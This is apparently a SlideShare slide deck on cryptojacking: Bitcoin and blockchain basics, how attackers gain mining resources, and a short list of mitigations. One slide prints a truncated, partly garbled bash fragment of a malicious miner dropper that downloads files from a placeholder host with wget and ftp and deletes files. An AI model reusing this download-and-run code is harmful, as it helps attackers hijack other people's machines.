SlideShare a Scribd company logo
HACKING OF
CRYPTOMINING
Agenda
is Bitcoin?
Bitcoin is a crypto currency and worldwide payment system. It is
the first decentralized digital currency, as the system works
without a central bank or single administrator.
The network is peer-to-peer and transactions take place
between users directly, without an intermediary.
These transactions are verified by network nodes through
the use of cryptography and recorded in a public distributed
ledger called a block chain.
Crytomining hacking
• The block chain is an incorruptible digital ledger of economic
transactions that can be programmed to record not just financial
transactions but virtually everything of value.
• Block chain technology is like the internet in that it has a built-in
robustness. By storing blocks of information that are identical across
its network, the block chain cannot:
> Be controlled by any single entity.
> Has no single point of failure.
is Block Chain?
Crytomining hacking
• The primary purpose of mining is to allow Bit coin nodes to reach a secure,
tamper-resistant consensus. Miners are paid any transaction fees as well as
a "subsidy" of newly created coins.
• The more compute resources contributed to the pool, the greater the
chance of mining a new block and collecting the reward. It's this search for
more compute resources that have led some miners to exploit enterprise
and cloud networks.
• Type of Mining:
> GPU Mining
> CPU Mining
> FGPA and ASIC Mining
and types of Mining
Server Side Request Forgery
Applications Hacking
And so on
HOW Mining Hacks happen?
Example of Cryptomining code?
#!/bin/bash
#set -x
ftp=ftp://public ip
Threads=350
rm -rfd.php
if [[ `uname` == 'Linux' ]]
then
wget -q http://public ip/sec/d.php
while IFS='' read -r line || [[ -n "$line" ]]; do
rm -rfwget*
rm -rfips
wget -q $ftp/$line
mv "$line" ips
port=$(echo $line |cut -d 'X' -f 1)
echo $port > ports
Sample code of Hacking
• Block Mining Pool Addresses
• Blocking unknown long connecting Sessions with DPI(deep packet
inspection)
• USING ADBLOCK.
HOW to Mitigate attacks?
• The Blockchain a New Web 3.0
• The sharing Economy
• Governance
• File storage
• Internet of Things (IoT)
• Data management
Block Chain?
References
• https://en.bitcoin.it/wiki/Mining
• https://blockgeeks.com/guides/what-is-blockchain-technology/
• https://thehackernews.com/2018/02/cryptocurrency-mining-
threat.html
Queries?

More Related Content

PDF
The Bitcoin Lightning Network
PPTX
Write Smart Contracts with Truffle Framework
PDF
Smart contracts using web3.js
PPTX
What is tezos
PPTX
Introduction to Blockchain
PPTX
R1x g16 blockchain
PDF
Bitcoin and blockchain engineering
PDF
Bitcoin Wallet &amp Keys
The Bitcoin Lightning Network
Write Smart Contracts with Truffle Framework
Smart contracts using web3.js
What is tezos
Introduction to Blockchain
R1x g16 blockchain
Bitcoin and blockchain engineering
Bitcoin Wallet &amp Keys

What's hot (20)

PPTX
Ethereum Web3.js - Some tips for the developer
PDF
Blockchain Тechnology - Introduction
PDF
Introduction to Bitcoin for programmers
PPTX
20180714 workshop - Ethereum decentralized application with truffle framework
PDF
Bitcoin for programmers - part 1 version 2
PDF
Cryptocurrency
PDF
Bitcoin: introduction for programmers - Pecha Kucha
PDF
The Lightning Network - A gentle introduction
PDF
“A bitcoin mining rig”
PPTX
Crypto currency1
PDF
Front-End Development for dApps on Tezos
 
PDF
2019 03 18_kenneth_simplebitcoinwebsite
PPTX
Multi-Signature Crypto-Wallets: Nakov at Blockchain Berlin 2018
PDF
Hydro Mining - Mining Bitcoin and other Cryptocurrencies with hydroelectric p...
PDF
Bitcoin and Blockchain
PDF
Bitcoin Lightning Network - Presentation
PPTX
Building a Blockchain in JavaScript - Nakov - at Beer.js - August 2018
PPTX
The Next Frontier of Bitcoin
PPTX
20190606 blockchain101
PDF
Introduction to Lightning Network
Ethereum Web3.js - Some tips for the developer
Blockchain Тechnology - Introduction
Introduction to Bitcoin for programmers
20180714 workshop - Ethereum decentralized application with truffle framework
Bitcoin for programmers - part 1 version 2
Cryptocurrency
Bitcoin: introduction for programmers - Pecha Kucha
The Lightning Network - A gentle introduction
“A bitcoin mining rig”
Crypto currency1
Front-End Development for dApps on Tezos
 
2019 03 18_kenneth_simplebitcoinwebsite
Multi-Signature Crypto-Wallets: Nakov at Blockchain Berlin 2018
Hydro Mining - Mining Bitcoin and other Cryptocurrencies with hydroelectric p...
Bitcoin and Blockchain
Bitcoin Lightning Network - Presentation
Building a Blockchain in JavaScript - Nakov - at Beer.js - August 2018
The Next Frontier of Bitcoin
20190606 blockchain101
Introduction to Lightning Network

Similar to Crytomining hacking (20)

PPTX
What is bitcoin?
PDF
Building Digital Transaction Systems in the new Banking World
PDF
The presentation on the Blockchain_Introduction_KR.pdf
PPTX
Understanding Blockchain
PPTX
Blockchain and Bitcoin
PPTX
Blockchain and Bitcoin
PPTX
Fundamentals of Block chain Technology
PPTX
Block chain introduction to the world and how we can utilise it
PDF
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
PPTX
Cooperative Mining by Stephen Reed (Bitcoin Proof-of-Stake Co-operative Project)
PPTX
Block chain
ODP
Fredericksburg LUG Bitcoin slides
PPTX
Blockchain English
PDF
Blockchain and BPM - Reflections on Four Years of Research and Applications
PDF
An introduction to blockchain and hyperledger v ru
PDF
Bitcoin, Banking and the Blockchain
PPTX
Blockchain and Cryptocurrencies
PPTX
chapter4.pptxwgdyjshcbnbhvegwydvquhcjdvqigufwk
PPTX
Understanding blockchain
What is bitcoin?
Building Digital Transaction Systems in the new Banking World
The presentation on the Blockchain_Introduction_KR.pdf
Understanding Blockchain
Blockchain and Bitcoin
Blockchain and Bitcoin
Fundamentals of Block chain Technology
Block chain introduction to the world and how we can utilise it
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
Cooperative Mining by Stephen Reed (Bitcoin Proof-of-Stake Co-operative Project)
Block chain
Fredericksburg LUG Bitcoin slides
Blockchain English
Blockchain and BPM - Reflections on Four Years of Research and Applications
An introduction to blockchain and hyperledger v ru
Bitcoin, Banking and the Blockchain
Blockchain and Cryptocurrencies
chapter4.pptxwgdyjshcbnbhvegwydvquhcjdvqigufwk
Understanding blockchain

Recently uploaded (20)

PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Spectral efficient network and resource selection model in 5G networks
PPTX
Spectroscopy.pptx food analysis technology
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
PDF
KodekX | Application Modernization Development
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PDF
Encapsulation theory and applications.pdf
PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PPTX
Cloud computing and distributed systems.
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Approach and Philosophy of On baking technology
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
cuic standard and advanced reporting.pdf
Encapsulation_ Review paper, used for researhc scholars
Review of recent advances in non-invasive hemoglobin estimation
Spectral efficient network and resource selection model in 5G networks
Spectroscopy.pptx food analysis technology
Reach Out and Touch Someone: Haptics and Empathic Computing
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
KodekX | Application Modernization Development
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
Encapsulation theory and applications.pdf
Unlocking AI with Model Context Protocol (MCP)
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Cloud computing and distributed systems.
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
20250228 LYD VKU AI Blended-Learning.pptx
Approach and Philosophy of On baking technology
Chapter 3 Spatial Domain Image Processing.pdf
cuic standard and advanced reporting.pdf

Crytomining hacking

  • 3. is Bitcoin? Bitcoin is a crypto currency and worldwide payment system. It is the first decentralized digital currency, as the system works without a central bank or single administrator. The network is peer-to-peer and transactions take place between users directly, without an intermediary. These transactions are verified by network nodes through the use of cryptography and recorded in a public distributed ledger called a block chain.
  • 5. • The block chain is an incorruptible digital ledger of economic transactions that can be programmed to record not just financial transactions but virtually everything of value. • Block chain technology is like the internet in that it has a built-in robustness. By storing blocks of information that are identical across its network, the block chain cannot: > Be controlled by any single entity. > Has no single point of failure. is Block Chain?
  • 7. • The primary purpose of mining is to allow Bit coin nodes to reach a secure, tamper-resistant consensus. Miners are paid any transaction fees as well as a "subsidy" of newly created coins. • The more compute resources contributed to the pool, the greater the chance of mining a new block and collecting the reward. It's this search for more compute resources that have led some miners to exploit enterprise and cloud networks. • Type of Mining: > GPU Mining > CPU Mining > FGPA and ASIC Mining and types of Mining
  • 8. Server Side Request Forgery Applications Hacking And so on HOW Mining Hacks happen? Example of Cryptomining code?
  • 9. #!/bin/bash #set -x ftp=ftp://public ip Threads=350 rm -rfd.php if [[ `uname` == 'Linux' ]] then wget -q http://public ip/sec/d.php while IFS='' read -r line || [[ -n "$line" ]]; do rm -rfwget* rm -rfips wget -q $ftp/$line mv "$line" ips port=$(echo $line |cut -d 'X' -f 1) echo $port > ports Sample code of Hacking
  • 10. • Block Mining Pool Addresses • Blocking unknown long connecting Sessions with DPI(deep packet inspection) • USING ADBLOCK. HOW to Mitigate attacks?
  • 11. • The Blockchain a New Web 3.0 • The sharing Economy • Governance • File storage • Internet of Things (IoT) • Data management Block Chain?